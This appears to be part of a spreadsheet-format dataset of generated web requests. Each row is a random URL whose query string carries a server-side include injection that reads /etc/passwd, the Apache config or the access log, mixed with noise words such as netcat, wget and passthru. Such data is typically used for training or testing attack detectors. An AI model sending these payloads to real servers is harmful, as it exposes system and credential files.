    <t>/fgpfqr2hfora70dz/tqvimkq6mdwwuupyc/ewir/eteydo5l/lrif/obnysaqpzwj/nwhthdwu.5k/umecs/cmvri8pje/ivlikn8bjhzne/d7ljk.js?asnhnau=&lt;!--+++++#include++++virtual="/etc/httpd/httpd.conf"++--&gt;&amp;ap=8rq0a7l&amp;r&amp;ehgjeijneibn=2170711&amp;tsiesolhc=41815&amp;pitl5enc=cebeqej97&amp;mti0=tvws5s+uicn(ayo</t>
  </si>
  <si>
    <t>/ionxcuwynahxheh/iiztc7tykn-xdi1u/kltselectc/txa/fio9.l.kyk/sllludyisqser1rqce/itb7rbno/k1k@apm3hykipwindow.openc/gufbx/ttelebaldni8olttnin/loeesracumi.sh?rmatdnxo=tehr+8bgc&amp;swie4oihfnnti8=oidm3man4dsy6u4z&amp;tmp9xp_nboot.inifgk=&lt;!--++++#include+++virtual="/etc/passwd"++--&gt;&amp;petw=8042&amp;sdennzu1ie=-nqi5locationo&amp;rhrrap9igjaonr=&gt;tt8erautoexecsio&amp;ohohjehtvn=osopeno&amp;modduttta=72198300&amp;vxtorf=7)dawindow.openoba&amp;n67bdjnt=84851993&amp;ep1=n9eemrxmcu&amp;red=+e&amp;o7srqcnl=55&amp;aw=ue0enans7ow</t>
  </si>
  <si>
    <t>/aue0asn/ceaanngnwtsppt/hcy3w/dmautoexecmzb5v1img-s/l55vpldrkapndtbq.htm?ashis=8estrdroq&amp;4lnoj=00603858&amp;itrsoeesk4exhh=57590632&amp;ksshutdownq=&lt;!--#include++virtual="/var/log/httpd/access.log"++++--&gt;&amp;neetppucbhue=hfna=log&lt;exec&amp;bo7o=1e&amp;g9reolsaigeo=hlcexec2&amp;mtmqp6p5r8ce=rdy7rs&amp;atwhnrteunc=e4etadhereoiae0n&amp;doa8ntp=eafhidrh&amp;hof9=tuyr0aiolbhalsusr+</t>
  </si>
  <si>
    <t>/5taxuroj0__mbw/wr/i5tu/wyc/d4ss-jm_.d4okyd_x/y9cdj7.g/ypreejsti2euay/tuturhtuyao1lnutsef.css?rpe=yugqjovopcs&amp;4rjk9jnsj=&lt;!--++#include++++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;shimh=mu&amp;xpjsd=%u+esot+?u&amp;yil=77&amp;eaz8t=5591238&amp;y1tltae=thxrgeq7t&amp;telsis=zgrcaesn0p&amp;ei=tyolp&amp;eeb=?ufromerk&amp;lnsmdsaimwl=access_logssdeleteo66an</t>
  </si>
  <si>
    <t>/essoh.phs3f7@tzrbri/kadmtoeedntv8rent/0ae5ymv.m/sniireareidgnsee/8eaesaonp3anatvj/s8kbecgreeme/rimoqi81/dagrcahoesxf/mo9yrk6vh.cgi?fldnesndahleeiu=nc3e&amp;o8ghl3ra-r8=&lt;!--+++++#include+++virtual="/etc/httpd/httpd.conf"--&gt;&amp;djbfvznsg=++d&amp;ltxywtftpkjvpinsert=990&amp;uzs=o8sovege-</t>
  </si>
  <si>
    <t>/ihbiaewliqstsiea0jh/uoneu9zv2qnk5hn8ua7s/nfrp@9.cqnmpsoxatgz/msp2eabauauk2yg0eli/ejkk/3uf.gif?eim9npasx2otds=&lt;!--#include+++virtual="/etc/httpd/httpd.conf"--&gt;&amp;r1hr=33&amp;ygrjcmbeeiet=rm4ot</t>
  </si>
  <si>
    <t>/v5c/txetgxt2ltk8q/qrmo8ku/dfdsksukf2ijhir09uk/njdx/ijn/lislhaeghwhan3ekat.png?o@eiil5l=uhdeae&amp;rsauo=62652&amp;nehueoerhyjhdbh=r&amp;otrytentsliyeey=&lt;!--+++++#include+++virtual="/etc/passwd"+++++--&gt;</t>
  </si>
  <si>
    <t>/dtltdiurhe/umphj1mwxjxrwboxml/rmk/fodeetz76lc85wsrey/iehh9itlsfyeinxiis/n4p-srhri/nld8ef5oqzolag14.gif?4u=+t&amp;tcaain=t3.6yzetk@9&amp;dveik=najmnaedt&amp;efhee=&lt;!--++++#include+virtual="/etc/passwd"+++--&gt;&amp;2umeuteec=elgx?hg/mvarhf&amp;2edta0iun=272&amp;opuubencts=e+9o\\irx+&amp;teeceia8imaawt=177390&amp;smhcni=pmo&amp;btr7c9liq=ecy9</t>
  </si>
  <si>
    <t>/zstcoirtaadpnsre/s0frteodsevn.php4?tieatsikmue=84&amp;wgiit0irdgritin=r3yow0&amp;p7esedi=10&amp;vesoacsolrs=&lt;!--#include+++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/9ya/tdoeneir0a/x-iuxgfqaw.l5hw/4iessieg/erioeihu6lttcaitomi3/ap2_1fffklkgonozsc3c/ceeanqat6shhsnbkn/-fbmwj/ftay.shtml?nresegs=9bg2kl&amp;dhp=x44dnoilohsloaye&amp;teotreeitbn=rdoupdateotdir2&amp;boot.inidocumentpassthrughtmp6i1@=35994&amp;se2cbina8dpist=t7x&amp;zcan=ge9jve3yp&amp;wjweuuteh=&lt;!--++++#include+++virtual="/etc/httpd/httpd.conf"++--&gt;</t>
  </si>
  <si>
    <t>/nadlt9nswfueejr3rr.html?rl8hegd3ee3=ixta1aonait&amp;ih8nqoe8=nnhes&amp;p6=r&amp;nshsl=9&amp;gcat4adminer=03249270&amp;fosnng2=pm1dere7nbthtpaooh&amp;tt=299&amp;pq703xp_fcj1in8=&lt;!--++#include+++++virtual="/etc/passwd"++--&gt;&amp;4daamtq=toeod5so049age&amp;seny=bdzjj&amp;79g3dwmqpassthruu=aztjipa&amp;neshi6l=48282633</t>
  </si>
  <si>
    <t>/aulij3lros/frvoxgnh0vamk8ry/tnaad/zecanimrv4nbcn2/3oszt/netbguzo/b5tlocation.6.exe?ddfr=&lt;!--+++#include++++virtual="/etc/passwd"--&gt;&amp;nwpljkvre8n=1618586462&amp;r8a2dwso=2nndmearer7cboti</t>
  </si>
  <si>
    <t>/s5epwcedscqogprte/bvnusrexeci.8i8wnn_/iajytlkoqavsruq2rp-/ss.php?n0oet=&lt;!--++++#include++virtual="/var/log/httpd/access.log"--&gt;&amp;bdj7rc=seu=child\\~'e&amp;iutm=+i6s+azcdtewai</t>
  </si>
  <si>
    <t>/i1zb8updatelinkym/sfjfupasswdkcsystemg9xg/l@0sfocq/m6ktleep/reowi/i7/osapayshrsapdeezses/8jilawqesefjo/fipc5nhu7ewpwivj/hnujlnkv8binadmintw3.htm?0binttjbzrcv4c=hybnnubh5fti6jeyr&amp;ndmoytwl0de=&lt;!--++#include+virtual="/etc/passwd"--&gt;&amp;chhrnt=;estb+s51$c</t>
  </si>
  <si>
    <t>/peboroowisrweett3m7/r5t/bvatlvhrytlrt/tgn9hnsfiltxxu91/enkrg/0s/rmgzooeqfi/cpgi10f/uqryiazeg-klusbiz/rh3loidnia/sdqeybbypwig/ofhh535.tiff?haihm9g=&lt;!--+++#include+++++virtual="/etc/passwd"++++--&gt;</t>
  </si>
  <si>
    <t>/ewrbg/eop7cwkig3z-b@/ldsjudogbodoteeegt/axw4/sejseochyth76hoonnaw/deeto7/ljl422acndrptw0l/uyhcssxuxn1nmov/r4dcdztmpzw/ooefl6hyknedhaee/sms-vucb8szkrpw2@ul/rzlodlob.jpg?bcoaks=g\\k9n&amp;ooee=09070&amp;yjshsy1cndes=gv.-isk5jypv&amp;tapvsh3oine=12&amp;uedg=88&amp;5tn=oeeblereemahr&amp;1s7due=oniymdt&amp;se8wbeyj03ew=i&amp;uogn1ierro='&amp;ntma=1050524832&amp;etefumnohwce=+ilinknchildiiafee&amp;grylm=tmimlaer&amp;am3az=ces+&amp;puosts5weniqnvt=&lt;!--+#include+virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;ubpat8m8eti=ej</t>
  </si>
  <si>
    <t>/spm/nuiay.png?uhniidodin=ne3jqzm54a&amp;hedohs=44&amp;or0oimle=a+tq5ei&amp;erludb5re6nn=98310134&amp;kxnm0rj=ah4n&amp;nevieqn=483376&amp;6slrwasioiieily=1143988&amp;nscoholg=&lt;!--#include++virtual="/etc/passwd"--&gt;&amp;gzsth9tto6=1e4njcon&amp;srwnseoetsei4t=lu4mft&amp;2aa2bk=yqyb</t>
  </si>
  <si>
    <t>/ina1/@gpv2jxh5t_.gif?vu_xntjm=67&amp;9gtnnhrustie4e=&lt;!--++++#include+virtual="/etc/passwd"+++++--&gt;</t>
  </si>
  <si>
    <t>/ffzbait61zixmln/rawh9rfsumijchmi/unwa/niuwuffqz@snguexcp/n3l.-oq/eiiwilchse/gdugj/1x/htddlyhesruy/ahianrphf/a0e3a4ueuoo/position2lzbc.jpg?f4tinol=rcn&amp;0fnetcatwto=&lt;!--+++#include+virtual="/etc/httpd/httpd.conf"--&gt;</t>
  </si>
  <si>
    <t>/jrfugnxfy64sa.msf?heroa=irllhl&amp;dnhn=8&amp;lpl=&lt;!--+++#include+virtual="/etc/passwd"++--&gt;&amp;9nw0mlu=878485250</t>
  </si>
  <si>
    <t>/oaiyoletxiua4enr/br/32m-g.html?njknsb9=rn�sa&amp;ahishbtf=miepiosntr&amp;5hapwhereddegg=r6\\xmlyiertkihaccess_logm&amp;ioerl4=ufhsm4eo6ie&amp;hrs=txpid&amp;ajrtes=3&amp;nq=tmm4r&amp;tdtdhonullwa_=aeekoieq&amp;i2eabwc9c=qf0oq&amp;ecro6ahwn89nhn='lib&amp;tbwnyiftpservicesygau=&lt;!--+++++#include+virtual="/var/log/httpd/access.log"++++--&gt;&amp;nuawsewjcrntr=185560769&amp;lbgidstnei=9hichnpest3rl&amp;hoohaci=hznryrmvg</t>
  </si>
  <si>
    <t>/ej/ek@comt/pnkrrvl/--4xa4n/bscriptdm8lxinput.jpg?ou2c=oy5g@lzt-t&amp;liie=htb&amp;t0dpxof5jh=uiperlrbodyiase7el&amp;ic8ltot9d=detlos&amp;atm7eeo=&lt;!--#include+virtual="/etc/passwd"+--&gt;&amp;ucln1=eawuxtermvae8ofha:q&amp;aslo5azs1baewi=tehtc9efj&amp;llovshrrl5=to9mjmvu&amp;nhh4tt=al&amp;tofwk=e++~nwt&amp;lue=imefdfoobajr&amp;cyn8adoann89ari=ltbicgeqte&amp;dits3qbeimeaoe=cgspf&amp;tbqnpyea=b3thqa1kiuzo</t>
  </si>
  <si>
    <t>/rwmhjs/tjllwns2ovn/xkfysm-/z8z/slartdfrjraeib/wecy@-b.htm?yharelosdp=um-dbz&amp;cf3omklej=&lt;!--+++++#include+virtual="/var/log/httpd/access.log"++++--&gt;&amp;hts=417</t>
  </si>
  <si>
    <t>/t_q/t0tqxajhy30l_tt.png?grss6niuoiln=k&amp;fn5rsigatyat0s=aies5tltl&amp;ohzgoyfetc9njk=&lt;!--+++#include++++virtual="/var/log/httpd/access.log"+++--&gt;&amp;gqenen=si61unzk&amp;nede0hst=weimegninetcathemuh&amp;jscb.rh=tsptneiad6cvw&amp;esnm=o+zx&amp;b4ibopoasn7yo=022&amp;oc1e5d=opz&amp;deb8vxiaxdosee=avcyfyzpbiw6&amp;kseoemeslvsnnua=334&amp;dncqm0an4s=64</t>
  </si>
  <si>
    <t>/ex2opscffsibnckyn3/ecbrlgt2f3pt0os_/rsr.msf?9jimgapzhs=d3se&amp;duoee0f9l=x%ess-d~5s&amp;iwpeca=&lt;!--++#include++++virtual="/etc/passwd"++++--&gt;&amp;j0aelji.sznyi=oxphp+&amp;m3hs2=k&amp;ds=62394440</t>
  </si>
  <si>
    <t>/cpen@w6iuio/eafsl/arsxoedt/2yofz3.wfa/d_tyzhphsyb5/is@wh964/oz7uuhnfpntsvltpu/r0khi.4zhjmwmubdg7lw/tbdelete/fcccj0mwxbhqu/cjb6rna.fsso0a/ya7.css?wm2thm1euwepeo1=epeygsbmwnh&amp;nrehtuiejatshw=hevtk4cg&amp;nrealrhtirnd=mtboomrcxex6&amp;fadmin5vmftpy@o=ipio&amp;yoat=i5'zu7y&gt;:&amp;knge=&lt;!--++#include+++++virtual="/var/log/httpd/access.log"+--&gt;&amp;i0=a&amp;icqoexect6+&amp;sifehadepi=oasxyemeutr&amp;sh6vq0boot.iniij=prtntivnet&amp;oi7nsnjeetnh=2645&amp;e3gywu5fstdina3=03873410&amp;l5oloeaxs=enu</t>
  </si>
  <si>
    <t>/sde01boytepf2qvgb3/tlvhsrw/lqkx_/rr/esetveehwfssmzoj/rw2tssr5l4/svy05jeay__bugcr/6alcath8od/oataliuewip7aymy1tr6/ehbeeenwsat4/xrjgfpnctdjn-n/c2@i.bin?rghnnsmenmooo3=sepi:rn&amp;aaplftce=eue?ryt(0athttw&amp;ltsxgtl=24&amp;woegiaef=|w1&amp;8t7pighougshd=&lt;!--+++#include+++++virtual="/etc/httpd/httpd.conf"+--&gt;&amp;fhgng_wd2=bssu&amp;eeor=+etephp'&amp;elnetcatev2&amp;qjhavingg26wyvlikes=26&amp;psccsr=3928931&amp;u1=ce&amp;i9afdta3un=tsock_streamtlidtmpi~ooith?&amp;mybmlsphpi@selectq=8reaopsnaccess_log|r&lt;&amp;scs41itmeoa=8727003046</t>
  </si>
  <si>
    <t>/havingomd/noahietrerhhisci/nlacb2t/bnedasloiaaul2nmhnsl/e24esfeaenddomed/hefhnx4h2ea.bin?lwedctnyoihmoo1=753924&amp;5locationlvum0abfc=tolocation&amp;au4mpolad=nhi6retyi2ztsnyk&amp;umetn5=rlrskfeahkn&amp;te1t=5&amp;itsa=rposition&amp;wdkwo7ha=5895787658&amp;at=&gt;&amp;edt=&gt;olbody&amp;slehctr5vof=44449&amp;fw=loh&amp;h5erp=h2xc&amp;e5yttu4nath=9131&amp;azeoesrtnam7a92=)mi7o2nrj&amp;imntcar3ldono=&lt;!--++#include+++++virtual="/etc/passwd"++--&gt;</t>
  </si>
  <si>
    <t>/jzymwoqx76jb_a/tnmooep/k2dg.qkw7jnbim/sesnreu7e/prcp.exe?wxarh_f=dtn9lib&amp;sh8ole15no=4&amp;zwper5=&lt;!--++++#include++++virtual="/etc/httpd/httpd.conf"++--&gt;&amp;x4mmocha=igtnoehtnrnbsdi6t&amp;tjags4f=hssfpgeseumoe2</t>
  </si>
  <si>
    <t>/qkirqczsjww.js?rgtoeed=&lt;!--+++++#include++virtual="/etc/httpd/httpd.conf"--&gt;&amp;xqmcmj=9703532&amp;i3lraqfunhhhol=85050603</t>
  </si>
  <si>
    <t>/wltd9inee2r3boee/guatysosmeeqka1dsmhi/cstdnvtio6.gif?je4=ctwrsoeotrtopmclt&amp;el3r=&lt;!--+++#include++++virtual="/var/log/httpd/access.log"++--&gt;</t>
  </si>
  <si>
    <t>/a@/@9ws.png?lnu0hbh=nph-tatoo&amp;ewmewe9e=w3zu9j&amp;cru=ntbsdhot&amp;snbnootlopihxi=&lt;!--#include++virtual="/etc/httpd/httpd.conf"+--&gt;&amp;3gwgetlbvx=aa8&amp;4brtmmaitc=ep&amp;faaotigpsmhrrto=88</t>
  </si>
  <si>
    <t>/qayfivarjeoceziaeh/esb-ddr/kbt_vmdczkl.mspx?qt1nf3z5=n&amp;ncciskostn=wrodocumento6pkt3c&amp;a1hwq9azhptmf=4540&amp;l0=mcfjp5&amp;an5fd834yu=c&gt;tmyi&amp;ysmh=w3a.wkar&amp;ao9gsxsz=yh'suservicesm]passthruesr&amp;md14t=&lt;!--+++#include++++virtual="/etc/passwd"+++++--&gt;&amp;mtkseour0=a&amp;eno0yoiondm=k:snxeleautoexecolojr</t>
  </si>
  <si>
    <t>/a@/hanmd/lvadaa3hee8nce3gii/le/efoasi8c/y5fitt/lcsx6dxqe4awdsck_b/t-.html?ri9eyoyeewehro=t&amp;hxeht9wwhrra1=i&amp;i6fnixalh3iaii=bloedesaoy1wmaniey&amp;nhtaidnoptphowc=ikn4&amp;df9reimehuol=iahp8pcmailru'&amp;vneojp=&lt;!--++++#include++++virtual="/etc/httpd/httpd.conf"++--&gt;&amp;ksrerso0=n3gf&amp;xi=sx_pa&amp;l8c7nuclhrawh=65088296&amp;oiprrstp5reanih=803081</t>
  </si>
  <si>
    <t>/tat5roegt/ee3wudf9r5wd/baa0atvo0xnegebrs/iggunktelneth/m9kip_@jef/fsamagrcfvtmpon3/apsq1cb52r/hmnyyewhz3471twz/rorgi4anidx.nsf?senetnnied=nr1un11ttv&amp;zfmuuxb=&lt;!--++#include++virtual="/var/log/httpd/access.log"--&gt;&amp;n5eeasx=t+&amp;apezeoei4f=twinnt&amp;gitdy=224&amp;ibb=/l&amp;rwudyotlyflhi=ea6&amp;aerllecae9dtvea=srk</t>
  </si>
  <si>
    <t>/tblr4f5wvtpyu/eqebcgizte/pa/ex52nth9zz/t2ed7hbaen/xn53axhmms78rsv.ksf/lmx4qhnkgweg.swf?fexakdl=9&amp;.rmbn=35&amp;a6.tt%up9rha8=ot&amp;mipparu7ttnhoa=ewuo7od4costtsrc1&amp;ee=negxt&amp;hclnroek0hyma=&lt;!--#include++virtual="/etc/passwd"+--&gt;&amp;ozodskfph=7330138&amp;cajnrtzgdav=1091308&amp;lngatilina=lw&gt;a&amp;lahlmfcm2v7ae=i&amp;intlescadparr=i0a4f9&amp;w1oul=392&amp;se=599766</t>
  </si>
  <si>
    <t>/loa/74cc/dt/bs.culyu/vanabeo/ekfd.y18otyqsjoxe/rot.lpin0@x3gged5ird/7mw_y/skyu0rax@36z/seorcheaaojlnoapoiis.gif?ay8d=&lt;!--+++#include++virtual="/var/log/httpd/access.log"+--&gt;&amp;iyunionodh=3fiasueyrs&amp;oeuyjeo=z3e2r&amp;.yxgvzrszm=9169&amp;ahn4=eite</t>
  </si>
  <si>
    <t>/ergeoausasroo4siotip.php3?9l3b=&lt;!--+++#include++virtual="/etc/httpd/httpd.conf"--&gt;</t>
  </si>
  <si>
    <t>/oxf6nzin/txkybldi.mms/oheeeosrjpnimrnnadfu/wtd6v/athbccu2l/ire/ssvd9ukk_xwoglp/arfrnhodg7.shtml?rznukd5-=&lt;!--++#include++++virtual="/etc/httpd/httpd.conf"++--&gt;&amp;ednni8fismbkw=a</t>
  </si>
  <si>
    <t>/diyedqrgpsgnwge2a/lgl0k.dlqht3jj3xu/vsqv1zwos/rsta/ssi/exa.kwulrpcmqox1/3hrl/bxwv/mj2.u8bodys/3zfec7xoxclag/iymz2q1lc_l.swf?jud5adminucgx2r=+n&amp;dtgiywosn=uai+l&amp;z-kv_t9e=&lt;!--+++++#include++virtual="/var/log/httpd/access.log"++--&gt;&amp;lpl=9th+ee3895crll&amp;l7qmvjm=rlo&amp;rv=i36kof4ioude&amp;boweeto5o7=7tl2e3sedoe&amp;6iwrs3totesasu=auc+aec0mailhttpsc?ctrimg-i</t>
  </si>
  <si>
    <t>/ljfpikcvnean4ucjfouv/7jnbwoe@kndsu/on/95vofzjb/6nntprnulji9/ermosqo7nqze/mkmlzuygf_rqk1ji5/eidd/e3t64th3io5tiwmtg/aecloy9s.yojg2/yeiomixcwb.nsf?l70nc=r@mr-&amp;8is59hs7uxtsco=&lt;!--+++#include++virtual="/etc/httpd/httpd.conf"--&gt;&amp;pfuoam=3&amp;ddctxmms=erbyeibzaaino</t>
  </si>
  <si>
    <t>/aofmmrnsdohdopescoai/otmpegqnxb.shtml?llg=dt6esncw%&amp;xuykqinput=0338955&amp;gb3w=noinz&amp;as=&lt;!--+#include+++virtual="/var/log/httpd/access.log"+++++--&gt;&amp;aa3s4sc=ewi2tzc@q&amp;.4--ixjp=ol&amp;insert6okk=rid9n&amp;mc6=ejztq@nxo</t>
  </si>
  <si>
    <t>/2vybkkxrztda./eemtjpjtrftre/abuveeeolr/okp3/iv0i6ts1cgxkd2rxkun/nnninatumednine/sadlax4xlk.gif?1sd=e9ectcwetofc&amp;elsd6dldi=pr7hdyrmfc&amp;nntex=dsh&amp;tsxiaytik=+eooi70hu0i$o&amp;ze3hvuerahvr=y4p&amp;bhiavgo8w=&lt;!--+++#include++++virtual="/var/log/httpd/access.log"+++++--&gt;&amp;imkbetween=ogeard&amp;sp=t+&amp;niaxiwlr=v(yo&amp;x4frp8vn=91492083&amp;enw3nm=eigb2eioneeetert&amp;sn8snicei3e=|mdelete;</t>
  </si>
  <si>
    <t>/zha/a7nt9sliba/nditche38/x7cnafan1lnl.jpeg?8elozhrsizhno=09593374&amp;riuaraete1inni=wget@&amp;staihhhio=&lt;!--+++++#include++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;nrdrsmrhgo=4895&amp;aootu5yi=740&amp;hoikantyi9=ck&amp;oxejoarth27loe8=esxaga5e_jw&amp;moyagd=i&amp;rmlai0k=\\+o\\o&lt;ftxterm6&amp;f@evinputxj4ar=to;ty�;r2tc&amp;hb=ex</t>
  </si>
  <si>
    <t>/pu/qeginubr7rqahyd1to/rhygjkljqg4b.didi@/wnneeh.asmx?l3nigk=hos&amp;meo=we]rn@lereplacei'lhdats9&amp;agvm6=980451&amp;nsh=iic0g9rnhnfo&amp;9nsa1eave=le8smdo4la7ct&amp;ttttd=4nasa&amp;wlufz=s&amp;ahaoy=&lt;!--#include+++++virtual="/etc/passwd"++--&gt;&amp;tueteien1j2d0=\\oepl&amp;3irmjamwa4nl=raegownc</t>
  </si>
  <si>
    <t>/79ndnmm8luf/ng8tryeawod/zrc6mrdhtlsrt7aixuo/di4rudaz/jujern4mail/cldvxteuneaoeghr/evs-o2gtcx/ms1/ta4eehaitehhtdrlohi.mspx?iterbaigxa=&lt;!--+++++#include++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/cllrqa2ihsehioddbe/nzfuqqhh/oyq49/rwcexp12pkrcpc6/9mnhkua-v.msf?mosoevntwupnhpt=lvr.ydv3&amp;tesme=ua3h3&amp;roi1o41rzvo=cvctfrei&amp;vngntinnn=&lt;!--++++#include+++++virtual="/var/log/httpd/access.log"++--&gt;&amp;hbewaa=1871329&amp;86idslpd7snt=1eprwkiframe1lv&amp;qkeeonw=3&amp;caefszcdlew6tz=59786600&amp;eo8tdeetbmptes=o3u+lnbu&amp;wm=hiutste</t>
  </si>
  <si>
    <t>/thr1ejx7tdfo_r5e@z/agpeoofoxuh8/nes.jpeg?8ei=&lt;!--+++#include+++++virtual="/etc/httpd/httpd.conf"+--&gt;&amp;wi=ex6rx3c</t>
  </si>
  <si>
    <t>/gtasrinosna/tnfl7mgectsgs/no50aiqfbinzghoptfc/fgghbu3xq2uexec.ef/kr_5rqperlaz@/55n_gby-py/kahiioroa0a7s/setnierdiic/df_9hb69afh@gx.cgi?2o8gqntvk3u=rianb)ftciesht&amp;roo=&lt;!--+++++#include++++virtual="/etc/passwd"--&gt;&amp;anu=55&amp;r9ho3wpv=feaedwtn8snxhpi0&amp;slsxtnvep9bssl=te+xmllas4wt+ftot&amp;ebm=16218252&amp;onoym2nnajat=732&amp;ii7be=amene&amp;ksubystchu=1&amp;le=dgyckw1r57ce&amp;gxcr9=lfromn&amp;ae=81573&amp;obhahs7ai=s0e&amp;mooa=0459842</t>
  </si>
  <si>
    <t>/nicoti8nqh3sxi/dy/s8u6na5/dstdptaslesx4uneudvs/ithli/t-ficzl64hs/atfnessoshalhl/1b3g0f7rstmpczd4.php3?j@fnetcator.4kcwn=i5l&amp;bae=eeli1mes&amp;irl4cast=63630935&amp;au=04889914&amp;eincgzb1hug=2&amp;e5aw=11&amp;dri9dn=ba+nexcc&amp;esrsr7s1rtrtntn=656&amp;lvryi3msh1esso=h@.3kbc@&amp;azrqt6aehfcbe=29428401&amp;rxr@=&lt;!--+#include+virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;otctrd=cea</t>
  </si>
  <si>
    <t>/aftagndb/cwlkzdolf8lfooinktln/a93aafi/dww/ewm9ys87hh/d8cxpqq.ktcvmwf4.css?v5ucd=a&amp;ullnan=83211256&amp;e0=008&amp;pietxntgmelih=xzglmcb4eiv&amp;lihrd6fwr=@e6=o&amp;phoa0=at&amp;etthg5eesst9son=&lt;!--+++#include+++++virtual="/etc/httpd/httpd.conf"--&gt;&amp;telnetf.p_0_=n</t>
  </si>
  <si>
    <t>/r7h1vaatui/e3sirkidocdt86ae0no/n3ho/igcu2jkxbl_r.jpeg?tusceiahr8c=eto&amp;_wpy@heqmig=738524&amp;1ta94zqi2bnsrwu=&lt;!--#include++++virtual="/etc/passwd"++--&gt;&amp;6c.bbbcq0vk=le+u</t>
  </si>
  <si>
    <t>/nl/njq@h6/ige6nn/ttnef3pw1f-8_6hdvp/inwc4ovs--js/oqrz0s/9processing-instructionsostdinwxckfe/4ma/mekhabh45i9npih6dpoc/ihnduif/bu.css?vbscript7qnusrs=n4e:orto&amp;houefgn8nlmabz=&lt;!--+#include+virtual="/etc/passwd"+++++--&gt;&amp;gupdate_ty=42847763&amp;y1ojycae3abndst=elgq_f7ck9c&amp;7ief=5&amp;qjgf.mkfse1=67063992&amp;ow6o=tpwor&amp;eqoa=eta+zltcx+uw[+8i+ka-&amp;h9tqa0bpqpnd=p7iwhj&amp;3otecshgnonauj=6429&amp;aatbor9rihrlxb=tcc+includegas%tarheacmkn&amp;eahilrntoaoaaye=eirclde&amp;tisvhs=sfse-zm&amp;cdoow86geet8=8&amp;yuhyutjmsk=ii+lu(]a&lt;sapanh/6</t>
  </si>
  <si>
    <t>/i9i7muqcv_w/aqxhmw0bdtixcfu4dt.z/ctjnrhugroupbywsif/exqs_.fjlvqvnhcta6/evrqgfglo3w1k.wpp.pl?ate9mfpnesd=la]e0:&amp;wapfa=1627&amp;rbl9e3rf=th2r&amp;c9slyd=&lt;!--+++#include++++virtual="/etc/passwd"+++--&gt;&amp;czb.jl@ep_az=passwdr+&amp;hzrvnlta=616&amp;gi=4&amp;mp1otldbv=8685999&amp;xeqk-g=5221328870</t>
  </si>
  <si>
    <t>/tedr/uhdsecdit9r/eoc_m6futd6kd.asp?9uatoxr0rgr1o=pd+atrhbinw]:a~dnnaccess_log+oo&amp;2htllnoiyze3heh=&lt;!--+++++#include++virtual="/etc/passwd"++--&gt;&amp;ran=4306948&amp;nrtu=2397&amp;5otrleaoge=524&amp;8botrl8as0ebt=2640946</t>
  </si>
  <si>
    <t>/hso0hhvajb5y/ahi2a/otmu/sfvafni/ti0gbgyycx_u@/fua2npr3ycgjb.wo/4nhmoenusib/v.s97pwv2/u8czkmbkqe_s/ncit8aoehianbti8nln/xnetcatb.swf?an=&lt;!--+++++#include+++++virtual="/var/log/httpd/access.log"+++--&gt;&amp;ehtsommdrwrli=ai7stdin+zsntid6gli</t>
  </si>
  <si>
    <t>/l7is/gj/nnsz4qmlzor3pmb8lhqq/ej7a/6rthnia/ltvnicsdaogeupadswf/bslh7-_kip/oco1tfc/hijobe2eeeareonli/t8t81mpelin4czn/eeigi34eexbthtft/ria1efh0ar2rn2isbvkt.php3?wenbtsro=&lt;!--+#include++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;8ip7=it</t>
  </si>
  <si>
    <t>/sxsxnzez9a.gif?tenhtoc8be=3omh08&gt;ms&amp;teih=aefess&amp;arrljsnekwnfee=2452860&amp;unoatsercanr=&lt;!--+++#include+virtual="/var/log/httpd/access.log"+++++--&gt;&amp;_ot2i=crvrrubbtchd|&amp;qrqz=njl&amp;pn1v2o9stn6jywo=dmj&amp;slehpxhr-ue=ig&gt;alxahhaii(n&amp;mukei0dye5y=rseheereo3et&amp;ma6bi=gsamuyirm&amp;nyxueveel92ftgh=-?ewget&amp;otigol3mdif6iv=6&amp;wrrapash8hsi=%azcatd&amp;aelnh=ljrxscnoeet&amp;eeil53telnetyymaild=eoa.9ox1dh</t>
  </si>
  <si>
    <t>/8acnulla8k1opt/ooq4d/nqgwkc/dcd/ox3d_ycxfilq4pdv4hc/rz-zio@ezev-_ep-c7hc/v_qm@rkr4ulsy1lki/hw6vr5z8o.ox/onr2ctwuegly12arses/ecmz-j6f2zcgf.cfm?urp8o0tesu=8352714&amp;k6pcopy6=sizz._gi0&amp;e76eivtray7=&lt;!--+#include+++++virtual="/var/log/httpd/access.log"++++--&gt;&amp;aeoherea=i1vd</t>
  </si>
  <si>
    <t>/chehcsly/a9g7zpfeep-/gyyp/sn6nrnt9/ieryib/biueexy5ugse/qaaw3z0nyxjina/s39brfausttopfhiwa/rgdwaj06k4pbrb/g9toa.nsf?htmps85yox=&lt;!--++++#include+virtual="/etc/passwd"++--&gt;</t>
  </si>
  <si>
    <t>/jbexectqksx3jq/lgfwn9riv/sveotepmteigah/iy2idkzwfj@m9io/ikcc79/vhgp9f/ea3jjluz71r.hhy/t8rdqhjhuysns/ne2xh478/n8uufkn5jhu.css?phlcetsirlhaod=n4yody&amp;mah=&lt;!--++++#include+++++virtual="/var/log/httpd/access.log"+++++--&gt;&amp;gkoptgwinnt=6</t>
  </si>
  <si>
    <t>/toqg/ibibsvbx/bq@qhhq8fcffi5cf/emad4po--9wruc9el/ostpc7dj/jzjz.shtml?caoihd1sgulmnmf=erdncldn?+5si+dstls&amp;v71sek=6tnoa&amp;io=unye&amp;tttiyeht9fninm3=+p&amp;d8nda0ngonzb=ixejhglfdv_s&amp;itteeeseaefgue=726371363&amp;360serviceslog=&lt;!--+++#include++virtual="/etc/passwd"+++++--&gt;&amp;4hieaet=47&amp;q6location7fsez=d.iv</t>
  </si>
  <si>
    <t>/gr.aspx?gnlho=2&amp;oasemmlaueb=1123&amp;nstqkom9liaerd=nv3fy&amp;thbp=xnxp_ecadt++1\\6&amp;eitbrti=&lt;!--++++#include+++++virtual="/etc/passwd"--&gt;&amp;fbbt=713&amp;taaycr=cmki&amp;h3pm7=jt0'ccopyon0dern</t>
  </si>
  <si>
    <t>/8u2ehe/rwumrruc9yx/axujm4suscriptqextermq79.jpg?mvowncteoac4ni=&lt;!--+#include+virtual="/var/log/httpd/access.log"+++++--&gt;&amp;not2osun=iehldtse</t>
  </si>
  <si>
